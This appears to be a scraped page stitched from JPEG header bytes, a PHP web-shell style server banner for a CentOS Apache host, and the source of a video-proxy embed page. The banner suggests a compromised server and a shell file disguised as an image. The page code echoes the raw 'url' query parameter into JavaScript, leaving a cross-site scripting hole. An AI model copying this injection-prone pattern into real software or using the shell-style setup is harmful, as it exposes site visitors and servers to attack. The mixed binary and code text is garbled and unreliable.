ÿØÿà JFIF ÿÛ „ ( %"1"%)+...383,7(-.-
![]() Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20 System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64 User : apache ( 48) PHP Version : 7.4.20 Disable Function : NONE Directory : /var/www/html/vidoe.top/proxy/ |
<html><head> <title>-Server 5 embed-</title> <style type="text/css"> body { background: #000000; margin: 0px; padding: 0px; } </style> <script src="http://code.jquery.com/jquery-latest.min.js" type="text/javascript"></script> </head> <body style="width: 100%; height: 100%"> <div style="width: 100%; height: 100%" id="yt_player"></div> <script> $(document).ready(function () { var loading = '<img src="http://www.ischool.vn/upanh/upload/10040308/01-2016/loading-56a45a681e31a.gif">'; $('#yt_player').html(loading); $.ajax({ type: 'GET', url: '/proxy/drama.php', data: 'url=<?php echo $_GET['url'];?>', dataType: '', success: function (data) { var n = data.indexOf("youtube.com"); if(n>0){ $('#ht_player').remove(); var show = '<iframe id="player" width="100%" height="100%" src="+data+?rel=0&showinfo=0&nologo=1&autohide=1&modestbranding=0&autoplay=1&enablejsapi=1" frameborder="0" allowfullscreen></iframe>'; $('#yt_player').html(show); }else{ var show = '<video id="ht_player" width="100%" height="100%" class="video-js vjs-default-skin" preload="none" poster="http://www.ischool.vn/upanh/upload/10040308/01-2016/loading-56a45a681e31a.gif" autoplay controls>'+data+'</video>'; $('#yt_player').html(show); } } }); }); </script> </body></html>